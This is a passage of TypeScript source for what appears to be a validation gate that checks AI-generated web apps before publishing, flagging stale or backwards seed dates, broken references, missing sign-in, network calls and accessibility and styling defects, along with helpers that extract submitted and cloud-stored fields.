   * timetable an edit added pass for sitting within a week of a stored one — the loophole the
   * request check exists to close.
   *
   * A week does not reach "push everything back two weeks", which the same review found refused
   * as samples. So when an edit moved every stored day it touched by ONE amount (`movedBy`), a
   * row's stored days moved by that amount are its own as well, however far. One amount, not
   * any: a sample timetable rewritten row by row to 9, 12 and 13 days later is new samples
   * whatever ids its rows kept, while a person's move carries the dates that belong together
   * with it — as the diagnostic asks.
   *
   * A written-out date gets nearer every day, which a token never does, so two cases are not
   * asked about it. A migration: the page is live and its seeds long since replaced. And an
   * edit that wrote no written-out sample: an app built on 1 September with dates reaching
   * seven weeks reaches two by mid-October, through no fault of "make the header green".
   */
  const STALE_SEED_HORIZON_DAYS = 30;
  const DAY_MS = 86_400_000;
  const now = options.now ?? new Date();
  const today = utcToday(now);
  const persons = statedDays(options.request ?? '', now);
  for (const [entity, rows] of Object.entries(listStartingRows(appCode))) {
    const horizons: number[] = [];
    const samples: { value: string; days: number; written: boolean }[] = [];
    const shift = storedRows ? movedBy(entity, rows) : null;
    for (const row of rows) {
      const kept = storedRows ? keptDays(entity, row) : [];
      // A stored row's days, and — when the edit moved the collection as one — where it moved them.
      const theirs = [...persons, ...kept, ...(shift === null ? [] : kept.map((d) => d + shift))];
      for (const [field, value] of Object.entries(row)) {
        if (typeof value !== 'string') continue;
        const token = tokenHorizonDays(value);
        if (token !== null) {
          horizons.push(token);
          continue;
        }
        if (options.migrating) continue;
        const day = writtenDay(value);
        if (day === null || day < today || isPersonsDay(day, theirs)) continue;
        samples.push({ value, days: Math.round((day - today) / DAY_MS), written: !untouched(entity, row, [field]) });
      }
    }
    // Written-out samples count when this app wrote one of them: a build always, an edit only
    // when it added or changed one (and then every one in the collection counts toward its reach).
    const invented = samples.filter((w) => w.written);
    if (invented.length) horizons.push(...samples.map((w) => w.days));
    if (horizons.length < 2) continue;
    const furthest = Math.max(...horizons);
    if (furthest > STALE_SEED_HORIZON_DAYS) continue;
    const reach = furthest === 0 ? 'today' : `+${furthest} day${furthest === 1 ? '' : 's'}`;
    const head =
      `1:1 The dates seeded into '${entity}' reach only ${reach}, so an app opened a few weeks after ` +
      'it is built shows an empty schedule — every sample row is already past. ';
    const tail =
      "Keep each row's end after its start: a start and its end, and days that belong together, move " +
      'together, by the same amount. Seed a date that has already gone only when the app styles ' +
      'finished items differently AND a finished one makes sense for this content — never invent a ' +
      'past event in a list of offers or in a schedule the person described.';
    /*
     * With written-out samples, not "if these are dates the person gave, keep them": the gate
     * has just checked, and nothing they asked for names these days. Said anyway, it is the one
     * way out the model would take, and every round after it would be refused for the same dates.
     */
    const shown = invented.slice(0, 3).map((w) => `'${w.value}'`).join(', ');
    const one = invented.length === 1;
    const whose = invented.length
      ? `${shown} ${one ? 'is' : 'are'} written out, but nowhere in what the person asked for names ` +
        `${one ? 'that day' : 'those days'}, so ${one ? 'it is a sample' : 'they are samples'} — and a ` +
        'written-out sample goes stale exactly as a token does. Write sample dates as relative tokens and ' +
        "spread them across the coming weeks with the furthest at least six weeks out — '+2d 18:00' … " +
        "'+44d 10:00' — so the page still has upcoming entries a month from now. A date is written out " +
        'only when it is one the person gave, as they gave it. '
      : 'If these are dates the person gave — an event on a given day, a wedding weekend, an opening ' +
        "week — write them as absolute dates and keep them, exactly the day and time they said: " +
        "'2027-06-11 18:00', never a relative token and never moved. Otherwise spread the sample rows " +
        "across the coming weeks with the furthest at least six weeks out — '+2d 18:00' … '+44d 10:00' " +
        '— so the page still has upcoming entries a month from now. ';
    flag('seed-dates-expire-soon', head + whose + tail);
  }

  /*
   * A seeded row that ends before it starts.
   *
   * Seen live 2026-09-29: a cafe launch page's opening-week offers read "Mon, Oct 26 – Sun,
   * Oct 25". Built on a Tuesday, '+3w mon' … '+3w sun' is exactly that: a named day moves
   * forward to the next such day FROM THE OFFSET, so from a Tuesday the Sunday lands first —
   * and on six publish days out of seven. A repair that moves a start and not its end does
   * the same with written-out dates. Each date is valid on its own, so no other rule looks,
   * and the page renders a range that runs backwards without complaint.
   *
   * Relative pairs are resolved exactly as publish will resolve them, from every day of the
   * week and at both ends of the day: the app is published whenever the person builds it, so
   * a pair that inverts on ANY of those is a row that will one day ship backwards. Clock times
   * alone are left out — a bar that opens at 18:00 and closes at 01:00 is not backwards — and
   * so is a pair with one date of each kind, which has no fixed order until it is published.
   *
   * Not asked of a migration: starting rows are written once, into an empty collection, so a
   * live app's rows are the owner's by now, and refusing it would only strand the page. For
   * the same reason an edit is asked only about the pairs it wrote (`untouched`, above).
   */
  if (!options.migrating) {
    for (const [entity, rows] of Object.entries(listStartingRows(appCode))) {
      rows.forEach((row, i) => {
        for (const [startField, endField] of rangeFields(row)) {
          const start = row[startField];
          const end = row[endField];
          if (typeof start !== 'string' || typeof end !== 'string') continue;
          if (untouched(entity, row, [startField, endField])) continue;
          const backwards = endsBeforeStart(start, end);
          if (!backwards) continue;
          const which = typeof row.id === 'string' && row.id ? `'${row.id}'` : `#${i + 1}`;
          flag('seed-end-before-start',
            `1:1 In '${entity}', row ${which} ends before it starts: ${endField} '${end}' ` +
              (backwards === 'relative'
                ? `can land before ${startField} '${start}'. A named day moves forward to the next such ` +
                  "day from the offset, so two in one row wrap — from a Tuesday, '+3w sun' is the day " +
                  "BEFORE '+3w mon'. Give a range plain day offsets that keep their gap whenever it is " +
                  "published — '+20d 09:00' … '+26d 18:00' — or, if the person gave these dates, write " +
                  "them as absolute dates: '2027-06-11 18:00'."
                : `is before ${startField} '${start}', so the page shows a range that runs backwards. If ` +
                  'the person gave these dates, write them exactly as they gave them; if the row was ' +
                  'moved, move its start and its end together, by the same amount.'),
          );
        }
      });
    }
  }

  /*
   * A reference from one seeded collection to another that can never resolve.
   *
   * A community centre seeded its sessions with `classId: '__seed1'` … `'__seed4'` while
   * its classes carried no `id` at all. So `upcomingSessionsFor(c.id)` matched nothing, and
   * every class on the page read "No upcoming sessions" — an app that looks finished and is
   * empty. The server assigns an id to each row it stores, so a hardcoded reference to a
   * row that does not declare its own id cannot ever match, whatever the server picks.
   *
   * Both halves are refused: a reference into a collection whose rows have no ids, and a
   * reference to an id that collection does not contain.
   */
  {
    const seeded = listStartingRows(appCode);
    const idsOf = (collection: string) =>
      new Set((seeded[collection] ?? []).map((r) => (typeof r.id === 'string' ? r.id : '')).filter(Boolean));
    const target = (field: string) => {
      const stem = field.replace(/Id$/, '');
      for (const candidate of [`${stem}s`, stem, `${stem}es`]) {
        if (seeded[candidate]) return candidate;
      }
      return undefined;
    };

    for (const [entity, rows] of Object.entries(seeded)) {
      for (const row of rows) {
        for (const [field, value] of Object.entries(row)) {
          if (!/[a-z]Id$/.test(field) || typeof value !== 'string' || !value) continue;
          const into = target(field);
          if (!into || into === entity) continue;
          const ids = idsOf(into);
          if (!ids.size) {
            flag('seed-ref-to-rows-without-ids', 
              `1:1 ${entity}.${field} is '${value}', but no row in '${into}' declares an id, so nothing ` +
                'can ever match it — the server gives each row an id of its own choosing. Give every ' +
                `row in '${into}' an explicit id and point ${entity}.${field} at one of those.`,
            );
          } else if (!ids.has(value)) {
            flag('seed-ref-to-missing-id', 
              `1:1 ${entity}.${field} is '${value}', which is not the id of any row in '${into}' ` +
                `(${[...ids].join(', ')}). The two collections never join, so the app renders empty.`,
            );
          }
        }
      }
    }
  }

  /*
   * A seeded date that will never resolve renders as nothing.
   *
   * A wedding page wrote `startsAt: '+2w 5fri 18:00'` — reaching for a weekday the token
   * language did not have. Publish passes an unrecognised string through untouched,
   * `S.fmt.date` returns '' for it, and the three events each rendered as a lone "·" where
   * their date and time should have been. Silent, and it looks like a styling bug.
   */
  for (const [entity, rows] of Object.entries(listStartingRows(appCode))) {
    for (const row of rows) {
      for (const [field, value] of Object.entries(row)) {
        /*
         * A past offset is the other token that is not one. Asked to seed "a date that has
         * already gone", the obvious guess is '-2d 07:00' — and the grammar has no minus, so
         * it renders as nothing, exactly like '+2w 5fri'. Two apps in the 2026-09-26 eval
         * shipped one (a cafe rota's past shift, a timetable's past session), each passing
         * the gate, because a string starting with '-' never reached the check below.
         *
         * Not asked of a migration, like the other two seed-row rules written with it (review
         * of the seed-dates merge). Starting rows reach a collection only in the publish that
         * CREATES the app (`seedOwnerContent`), and a migration republishes one that exists,
         * so this row is already on the page or never will be; refusing strands the page.
         */
        if (typeof value === 'string' && PAST_OFFSET.test(value.trim())) {
          if (options.migrating || untouched(entity, row, [field])) continue;
          flag('seed-date-past-offset',
            `1:1 '${value}' in ${entity}.${field} is not a date token — there is no past offset, so ` +
              'publish leaves it as text and the app renders an empty date. Seed a finished item only ' +
              'where one belongs in this content, and write its date out in full as a day that has ' +
              "already gone ('2026-09-20 18:00'); every other seeded date is '+1d', '+3d 18:30' or " +
              "'+2w fri 18:00', or the date the person gave.",
          );
          continue;
        }
        if (typeof value !== 'string' || !value.startsWith('+')) continue;
        if (DATE_TOKEN.test(value.trim())) continue;
        flag('seed-date-not-a-token', 
          `1:1 '${value}' in ${entity}.${field} is not a date token, so publish leaves it as text and ` +
            "the app renders an empty date. The forms are '+1d', '+3d 18:30', '+2w 09:00', and a named " +
            "day after the offset: '+2w fri 18:00'. Nothing else resolves.",
        );
      }
    }
  }

  for (const at of isoRoundTrips) {
    flag('iso-string-of-stored-value', 
      `${at}:1 \`new Date(value).toISOString()\` throws "Invalid time value" the moment that value ` +
        'cannot be parsed, and the throw happens inside render(), so the whole app shows an error and ' +
        'nothing else. Pass the stored value straight to S.fmt.date / S.fmt.time — they parse it ' +
        'themselves and return \'\' rather than throwing. `new Date().toISOString()` with no argument ' +
        'is fine; this is the form with one.',
    );
  }

  // An app must make a deliberate identity choice. Without this the model falls back to
  // the default tokens on every app, which is exactly the templated sameness the kit
  // system exists to break — and a default is not a design decision.
  const known = (id: string | undefined) => (id && KIT_IDS.includes(id) ? id : undefined);
  const chosenKit = known(options.kitId);
  const keptKit = known(options.currentKitId);
  /*
   * An edit's repair offers the look the app has AND the others, never only the old one.
   *
   * The edit may be "give it the editorial look". If the model then drops S.kit or misspells
   * the id, a repair that says only "call S.kit('<old>')" reverts the restyle the person
   * asked for — and the edit still reports success. `currentKitId` exists to stop an edit
   * reshuffling the look by SUBJECT, not to refuse a look somebody asked for; so the repair
   * names both ways out, and the change decides which.
   */
  const keepOrChange = (kit: string) =>
    `keep S.kit('${kit}') as the first line of your script, or if the change asks for a different look, ` +
    `use one of: ${KIT_IDS.filter((id) => id !== kit).join(', ')}.`;
  if (!kitCall.present) {
    flag('kit-missing',
      chosenKit
        ? `1:1 This app never calls S.kit(...). The person chose the '${chosenKit}' look — make ` +
            `S.kit('${chosenKit}') the first line of your script.`
        : keptKit
          ? `1:1 This app never calls S.kit(...). It already uses the '${keptKit}' look — ${keepOrChange(keptKit)}`
          : `1:1 This app never calls S.kit(...). Choose the visual identity that fits the subject — ` +
              `one of: ${KIT_IDS.join(', ')} — as the first line of your script, e.g. S.kit('${KIT_IDS[0]}').`,
    );
  } else if (typeof kitCall.id !== 'string' || !KIT_IDS.includes(kitCall.id)) {
    flag('kit-unknown',
      chosenKit
        ? `1:1 S.kit(${JSON.stringify(kitCall.id)}) is not a known kit. The person chose '${chosenKit}' — ` +
            `call S.kit('${chosenKit}').`
        : keptKit
          ? `1:1 S.kit(${JSON.stringify(kitCall.id)}) is not a known kit. This app already uses ` +
              `'${keptKit}' — ${keepOrChange(keptKit)}`
          : `1:1 S.kit(${JSON.stringify(kitCall.id)}) is not a known kit. Use one of: ${KIT_IDS.join(', ')}.`,
    );
  } else if (chosenKit && kitCall.id !== chosenKit) {
    flag('kit-not-the-picked-one', 
      `1:1 S.kit('${kitCall.id}') replaces the '${chosenKit}' look the person picked. Call ` +
        `S.kit('${chosenKit}') — the look is theirs to choose, not the app's.`,
    );
  }
  if (!definesRender) {
    flag('render-missing', 
      '1:1 This app never defines render(). The runtime calls render() on load, after every ' +
        'store change and after S.go(...) — without it the screens are never filled in and the ' +
        'app shows nothing. Add: function render() { ... }',
    );
  }
  if (!/data-screen=/.test(appCode)) {
    flag('screens-missing', 
      '1:1 This app has no screens. Every screen must be an element with a data-screen ' +
        'attribute, e.g. <section data-screen="home" class="s-screen">, so S.go(id) can switch to it.',
    );
  }
  // A collection app has to persist locally and open full. A SUBMISSION app — a waitlist,
  // a signup, a contact form — legitimately has neither: its data goes to the server, and
  // seeding it with three invented signups would be fabricating content the owner would
  // then see in their real list. Requiring a local store here rejected the exact apps this
  // capability exists for.
  if (submitCalls > 0 || cloudCallCount > 0 || publicReadCount > 0) {
    // Nothing to require: S.submit and S.cloud ARE the persistence.
    //
    // S.cloud belongs here for a second reason. Its rows are scoped to the signed-in
    // person, so a new account legitimately starts empty and there is nothing honest to
    // seed — inventing three books in someone's reading list is the same lie as inventing
    // three signups. Demanding a seeded S.store rejected the first accounts app outright,
    // three times, for refusing to fabricate data it must not have.
    //
    // S.list and S.seats belong here for the same reason: their content lives on the
    // server and the owner edits it after publishing, so a rota viewer legitimately holds
    // nothing locally and has nothing honest to seed.
  } else if (storeCalls === 0) {
    flag('store-missing', 
      '1:1 This app never calls S.store(...), so nothing it does survives a reload — on the web ' +
        'the user WILL reload. Hold every collection in S.store(name, seed), or use S.submit(...) ' +
        'if this is a signup/waitlist form that sends entries to you instead.',
    );
  } else if (objectSeeds.length) {
    flag('store-seeded-with-object', 
      `1:1 S.store('${objectSeeds[0]}', { … }) was seeded with an object. A store is a LIST of ` +
        'rows, so the seed must be an array — S.store(\'' + objectSeeds[0] + '\', [{ … }, { … }, { … }]). ' +
        'Seeding an object throws, which leaves the rest of your script unrun and the page blank.',
    );
  } else if (seedIsProvable && seededRows < 3) {
    flag('seed-too-few-rows', 
      `1:1 This app seeds only ${seededRows} row(s). Pass at least 3 realistic records as the ` +
        'second argument to S.store(name, seed) so the app opens full of content instead of empty.',
    );
  }
  // The server rejects any key it was not told to expect, and the collection's fields are
  // read straight out of this object literal at publish time. A row built somewhere else
  // cannot be read statically, so the entity would be declared with no fields and refuse
  // every submission at runtime — a form that looks fine and silently accepts nobody.
  if (badSubmitRow) {
    flag('submit-row-not-literal', 
      '1:1 S.submit(...) must be given the row as an object literal written in the call, e.g. ' +
        "S.submit('signups', { name: name, email: email }) — not a variable built elsewhere. The " +
        'fields you list there are what the server is told to accept.',
    );
  }
  if (options.mustCollect && submitCalls === 0) {
    flag('collects-without-submit', 
      '1:1 This app collects from visitors, but it never calls S.submit — so every reply is ' +
        "saved in that visitor's own browser and the owner receives nothing. A community-classes " +
        "app did exactly this: it wrote enrolments to S.store('enrolments'), which looks like it " +
        'works and signs nobody up. Send the row with S.submit(collection, { … }). Keep S.store ' +
        'only for what belongs to the person using the page.',
    );
  }

  // Extracting frames and then not looking at them is the one way to get this wrong that
  // still runs: the app reads the clip, bills nothing, and shows the person nothing.
  if (framesCalls > 0 && !/S\.ai\.see\s*\(/.test(appCode)) {
    flag('frames-never-seen', 
      '1:1 This app calls S.frames(...) but never S.ai.see(...). Frames exist to be looked at — ' +
        'extract them and then ask a question about one, or the person waits for a clip to be ' +
        'read and is told nothing.',
    );
  }

  /*
   * An app that uses AI has to let someone SIGN IN to use it.
   *
   * A published app's AI is reachable only by a signed-in person, so that a stranger
   * cannot silently spend the owner's credits. An app that calls S.ai and never offers a
   * way in is therefore finished, published, beautiful, and unusable: every visitor taps
   * the button, the server answers 401, and they are told to sign in by a page with
   * nowhere to do it. A recipe app shipped exactly like that and nothing noticed, because
   * everything about it was correct except that no one could use it.
   */
  // Matched as text, not as a call: `S.auth.signIn(...)` is a member call on `S.auth`,
  // so an AST check for a call to `S.auth` itself never sees it.
  const usesAi = /S\.ai\.[a-z]+\s*\(/.test(appCode);
  const offersSignIn = /S\.auth\s*\./.test(appCode);
  if (usesAi && !offersSignIn) {
    flag('ai-without-sign-in', 
      '1:1 This app uses S.ai but never calls S.auth, so nobody can use the AI in it. A ' +
        "published app's AI needs a signed-in person — a stranger must not be able to spend " +
        "the owner's credits — and a visitor who taps the button is told to sign in by a page " +
        'with nowhere to do it. The short way is `S.auth.open("use the coach")`, which sends ' +
        'them to the one Saddle sign-up page and brings them back signed in; one account ' +
        'works across every app, so most people will already have one. Build your own form ' +
        'with S.auth.signUp / S.auth.signIn only if this app needs something that page ' +
        'cannot do. Either way, check S.user before offering the AI.',
    );
  }

  // The guarantee S.store has and S.list had lost: an app must not open empty. An owner
  // who builds a rota and opens their own link to nothing assumes it is broken.
  const listNames = listCalls(appCode);
  /*
   * Not checked on a migration: this rule is about an app opening EMPTY on the day it is
   * built, and an app that is already live has had its collection filled for weeks. Held
   * to it anyway, every app published before the rule existed became unmigratable —
   * frozen on an old runtime, which is the failure `migrating` exists to prevent.
   */
  if (listNames.length && !options.migrating) {
    const starting = listStartingRows(appCode);
    const bare = listNames.filter((n) => (starting[n]?.length ?? 0) < 3);
    if (bare.length) {
      flag('list-opens-empty', 
        `1:1 S.list('${bare[0]}') ships no readable starting rows, so this app opens EMPTY ` +
          'for the owner who just built it. Pass 3-6 rows as the second argument — ' +
          `S.list('${bare[0]}', [{ … }, { … }, { … }]) — written entirely as LITERALS. They ` +
          'are read at publish and written into the collection once, so a function call like ' +
          'daysFromNow(1) cannot be read and the whole row is skipped. For a sample date or time ' +
          "use a relative token: '+1d', '+3d 18:30', '+2w 09:00' — publish turns it into a real " +
          'date, so the app is never stale whenever it is built. A date the person gave is ' +
          "written as that date, '2027-06-11 18:00', and published exactly as written.",
      );
    }
  }

  const colours = hardcodedColours(appCode);
  if (colours.length && cosmetic(options)) {
    flag('hardcoded-colour', 
      `1:1 Your CSS hardcodes ${colours.join(', ')}. Colour comes from the kit you chose — use ` +
        'var(--accent), var(--accent-ink), var(--accent-wash), var(--surface), var(--surface-2), ' +
        'var(--ink), var(--ink-muted), var(--line) and var(--shadow). A literal colour paints over ' +
        'the kit and stays put in dark mode, where every token around it changes.',
    );
  }
  if (badSubmitEntity) {
    flag('submit-collection-not-string', 
      "1:1 S.submit(...) needs its collection name as a plain string, e.g. S.submit('signups', { … }).",
    );
  }
  if (banned.size > 0) {
    flag('network-access', 
      `1:1 This app uses ${[...banned].join(', ')}. Generated apps are self-contained and offline — ` +
        'no network calls. Seed the data in the file instead.',
    );
  }
  if (/<script[^>]+\bsrc=/i.test(appCode) || /<link\b[^>]*\bhref=["']https?:/i.test(appCode)) {
    flag('external-script', 
      '1:1 This app loads an external script or stylesheet. Everything must be inline so the app ' +
        'works offline and cannot break when a CDN changes.',
    );
  }
  // Semantics on the web come from using the right element. A page that registers click
  // handlers but contains no <button> is driving everything from divs — unreachable by
  // keyboard and announced as plain text by VoiceOver. Exactly the defect found on device
  // in the mini-app path, in its web form.
  if (clickHandlers > 0 && !/<button\b/i.test(appCode)) {
    flag('clicks-without-button', 
      '1:1 This app handles clicks but contains no <button> element. Tappable things must be ' +
        '<button> (not <div> or <a>) so they are keyboard-reachable and announced as buttons; ' +
        'use class="s-row-tap" or "s-btn" to style them.',
    );
  }

  // An app with accounts must show a signed-out visitor the way in.
  //
  // Everyone arrives signed out — that IS the first screen — and an app that renders its
  // signed-in view to a stranger shows them an empty page with no explanation and no
  // button. The prompt has asked for this all along; a generated rota shipped without it,
  // which is how it became a rule rather than a request.
  //
  // But the repair must not describe a WALL. Signed-out visitors see and use the whole app;
  // a personal list shows an invitation where it would be empty, and the sign-in is asked
  // for at the first save. This used to say "the signed-in view only when `S.user` is set",
  // which repaired apps INTO the sign-in wall the prompt forbids. And asking a cloud list
  // `.needsSignIn()` IS checking who is signed in — it is the prompt's own recommended way
  // to branch a personal list — so an app that does only that was being refused for
  // following the prompt.
  const usesAccounts = /S\.auth\.(signIn|signUp)\b/.test(appCode) || /S\.cloud\s*\(/.test(appCode);
  if (usesAccounts) {
    const branchesOnUser = /S\.user\b/.test(appCode) || /\.needsSignIn\s*\(/.test(appCode);
    const offersAWayIn = /sign\s*in|log\s*in|sign\s*up|create an account|get started/i.test(appCode);
    if (!branchesOnUser) {
      flag('accounts-never-check-sign-in', 
        '1:1 This app uses accounts but never checks whether anyone is signed in (`S.user`, or ' +
          "a cloud list's `.needsSignIn()`). Everyone arrives signed out, and every screen must " +
          'still open and work for them — never hide the app behind a sign-in screen. Where a ' +
          'personal list would be empty, check `list.needsSignIn()` and show an invitation to ' +
          "sign in (`S.auth.open('…')`) instead. Let the first save ask: the Save button calls " +
          '`list.add({ … })` directly, and signed out the runtime keeps the row, sends them to ' +
          'sign in and saves it once they are back. Never return before the add — a guard that ' +
          'does leaves them signed in to an empty app.',
      );
    } else if (!offersAWayIn) {
      flag('accounts-without-way-in', 
        '1:1 This app uses accounts but has no visible way in: a signed-out visitor is never ' +
          'told they can sign in, or why. Where their personal data would be empty (a cloud ' +
          'list that `needsSignIn()`), put a real control — "Sign in", "Create an account" — ' +
          'beside a line saying what signing in keeps for them.',
      );
    }
  }

  // A stored timestamp put on screen raw. "2026-09-10T16:00:00.000Z" is what the machine
  // stored, not what a person reads, and it is what a row the OWNER added later always
  // looks like. Flagged when a date-ish field is concatenated into a string without going
  // through S.fmt, which is the shape this always takes.
  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }

    // Anything already handed to S.fmt is fine, however it is then used.
    const formatted = new Set<Node>();
    walk(program, (n) => {
      if (n.type !== 'CallExpression') return;
      const callee = n.callee as Node | undefined;
      if (callee?.type !== 'MemberExpression') return;
      const obj = callee.object as Node | undefined;
      const isFmt = obj?.type === 'MemberExpression'
        && ((obj.object as { name?: string })?.name === 'S')
        && ((obj.property as { name?: string })?.name === 'fmt');
      if (!isFmt) return;
      for (const arg of ((n.arguments as Node[] | undefined) ?? [])) walk(arg, (a) => formatted.add(a));
    });

    // `due` and `at` are deliberately absent: in a scheduling app they are keys and
    // comparisons, not something shown, and flagging them left the model with a rule it
    // could not satisfy without breaking its own logic.
    const DATEISH = /^(date|day|start|end|time|when|starts|ends|startsAt|endsAt|createdAt|updatedAt|startTime|endTime|datetime)$/i;

    /** Whether this expression is building markup — the only kind that reaches a reader. */
    const buildsMarkup = (node: Node): boolean => {
      let found = false;
      walk(node, (n) => {
        if (found || n.type !== 'Literal') return;
        const v = (n as { value?: unknown }).value;
        if (typeof v === 'string' && /[<>]/.test(v)) found = true;
      });
      return found;
    };

    let offender: string | null = null;
    walk(program, (n) => {
      if (offender) return;
      if (n.type !== 'BinaryExpression' || (n as { operator?: string }).operator !== '+') return;
      // `'card-' + c.due` is an id; `'<b>' + s.start + '</b>'` is a page. Only the second
      // is a defect, and the difference is whether any part of it is markup.
      if (!buildsMarkup(n)) return;
      for (const side of [n.left as Node, n.right as Node]) {
        if (side?.type !== 'MemberExpression' || (side as { computed?: boolean }).computed) continue;
        if (formatted.has(side)) continue;
        const prop = (side.property as { name?: string })?.name;
        const obj = (side.object as { type?: string; name?: string });
        // Only a field read off a row variable — not S.something, not a DOM node.
        if (!prop || !DATEISH.test(prop) || obj?.type !== 'Identifier' || obj.name === 'S') continue;
        offender = `${obj.name}.${prop}`;
      }
    });

    if (offender) {
      flag('date-shown-unformatted', 
        `1:1 \`${offender}\` is put into a string without formatting. A stored date reads as ` +
          '"2026-09-10T16:00:00.000Z" on the page — that is what the machine stored, not what ' +
          'a person reads, and it is exactly what a row added later looks like. Wrap it: ' +
          '`S.fmt.date(v)` for the day, `S.fmt.time(v)` for the clock, `S.fmt.date(v, { … })` ' +
          'for another shape.',
      );
      break;
    }
  }

  // The single most common way a generated page becomes unreadable: --accent-ink is the
  // colour of text ON the solid accent, and --accent-wash is a pale tint of it. Together
  // they are near-white on near-white. Checked as a pair inside one rule, so an app that
  // legitimately uses either alone is untouched.
  for (const rule of cosmetic(options) ? appCode.match(/\{[^{}]*\}/g) ?? [] : []) {
    const onWash = /background[^;]*var\(\s*--accent-wash/.test(rule);
    const inkText = /(?:^|[^-])color\s*:[^;]*var\(\s*--accent-ink/.test(rule);
    if (onWash && inkText) {
      flag('accent-ink-on-wash', 
        '1:1 A rule sets `color: var(--accent-ink)` on `background: var(--accent-wash)`. ' +
          '--accent-ink is for text on the SOLID accent; on the pale wash it is near-white ' +
          'on near-white and cannot be read. Use `color: var(--accent)` on a wash — or use ' +
          'the built-in `.s-chip is-on`, which already pairs them correctly.',
      );
      break;
    }
  }

  return { ok: diagnostics.length === 0, diagnostics, rules };
}

export interface SubmitCall {
  entity: string;
  /** Keys of the object literal passed as the row, or null when it is not a literal. */
  fields: string[] | null;
}

/**
 * Every `S.submit(entity, { … })` in an app, read from the same AST the gate walks.
 *
 * Publishing needs the FIELD NAMES, not just the collection: the server rejects any key
 * it has not been told about ("Unknown field: email"), so an entity declared with no
 * fields refuses every submission — which is exactly what shipped before a live test
 * caught it. Deriving them here keeps the declared schema and the code that posts to it
 * from ever disagreeing.
 */
export function submitCalls(appCode: string): SubmitCall[] {
  const out: SubmitCall[] = [];
  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'submit')) return;
      const args = (n.arguments as Node[] | undefined) ?? [];
      const entity = (args[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity !== 'string') return;
      const row = args[1];
      let fields: string[] | null = null;
      if (row?.type === 'ObjectExpression') {
        fields = [];
        for (const prop of (row.properties as Node[]) ?? []) {
          const key = prop.key as { name?: string; value?: unknown } | undefined;
          const name = key?.name ?? (typeof key?.value === 'string' ? key.value : undefined);
          if (name && prop.type === 'Property') fields.push(name);
        }
      }
      out.push({ entity, fields });
    });
  }
  return out;
}

/** A per-user collection an app reads and writes for the signed-in person. */
export interface CloudCall {
  entity: string;
  /** Keys the app actually writes, gathered from its .add()/.update() literals. */
  fields: string[];
}

/**
 * Every `S.cloud('name')` in an app, with the fields it writes.
 *
 * Two passes, because the fields are never on the S.cloud call itself: the app assigns it
 * to a variable and writes through that (`var notes = S.cloud('notes'); notes.add({…})`).
 * Publishing needs the field names for the same reason submissions do — the server refuses
 * any key it was not told about, so a collection declared without them would reject every
 * write the app makes.
 */
export function cloudCalls(appCode: string): CloudCall[] {
  const byVar = new Map<string, string>();
  const fields = new Map<string, Set<string>>();

  /*
   * Every S.cloud call counts, whatever shape it takes.
   *
   * Field discovery below needs the collection assigned to a variable, and the prompt asks
   * for that — but an app that wraps it instead (`function cards() { return
   * S.cloud('cards'); }`) used to be found by nothing, so the collection was never declared
   * server-side and every save failed with "That did not save." A collection the app names
   * is a collection the server must know about, however the app happens to name it.
   */
  const named = new Set<string>();
  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'cloud')) return;
      const entity = ((n.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity === 'string' && entity) named.add(entity);
    });
  }
  for (const entity of named) fields.set(entity, new Set());

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }

    walk(program, (n) => {
      if (n.type !== 'VariableDeclarator') return;
      const id = n.id as { type?: string; name?: string } | undefined;
      const init = n.init as Node | undefined;
      if (id?.type !== 'Identifier' || !id.name || !init || !isSaddleCall(init, 'cloud')) return;
      const entity = ((init.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity !== 'string') return;
      byVar.set(id.name, entity);
      if (!fields.has(entity)) fields.set(entity, new Set());
    });

    walk(program, (n) => {
      if (n.type !== 'CallExpression') return;
      const callee = n.callee as Node | undefined;
      if (callee?.type !== 'MemberExpression') return;
      const obj = callee.object as { type?: string; name?: string } | undefined;
      const prop = callee.property as { name?: string } | undefined;
      if (obj?.type !== 'Identifier' || !obj.name) return;
      const entity = byVar.get(obj.name);
      if (!entity) return;
      if (prop?.name !== 'add' && prop?.name !== 'update') return;

      const args = (n.arguments as Node[] | undefined) ?? [];
      const row = prop.name === 'add' ? args[0] : args[1];
      if (row?.type !== 'ObjectExpression') return;
      for (const p of ((row.properties as Node[] | undefined) ?? [])) {
        if (p.type !== 'Property') continue;
        const key = p.key as { name?: string; value?: unknown } | undefined;
        const name = key?.name ?? (typeof key?.value === 'string' ? key.value : undefined);
        if (name) fields.get(entity)!.add(name);
      }
    });
  }

  return [...fields].map(([entity, set]) => ({ entity, fields: [...set] }));
}

/** Every `S.subscribe('list', email)` — the mailing lists an app collects into. */
export function subscribeCalls(appCode: string): string[] {
  const out = new Set<string>();
  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'subscribe')) return;
      const entity = ((n.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity === 'string') out.add(entity);
    });
  }
  return [...out];
}


/** '-3d', '-1w 18:00' — the past offset the token grammar does not have. */
const PAST_OFFSET = /^-\d{1,3}[dwh](?:\s|$)/i;

/*
 * The words a range's two ends go by. `expires`, `finish` and `last` joined after review
 * (2026-09-29): an offer seeded { date: '2026-10-26', expires: '2026-10-25' } passed, because
 * an offer ends by expiring and the rule only knew end, until, to and close.
 */
const RANGE_START = new Set(['start', 'starts', 'begin', 'begins', 'from', 'open', 'opens', 'first']);
const RANGE_END = new Set([
  'end', 'ends', 'until', 'to', 'close', 'closes', 'expires', 'expiry', 'finish', 'finishes', 'last',
]);
/**
 * The end words that end what a plain `date` (or `day`) starts, when no start word is there.
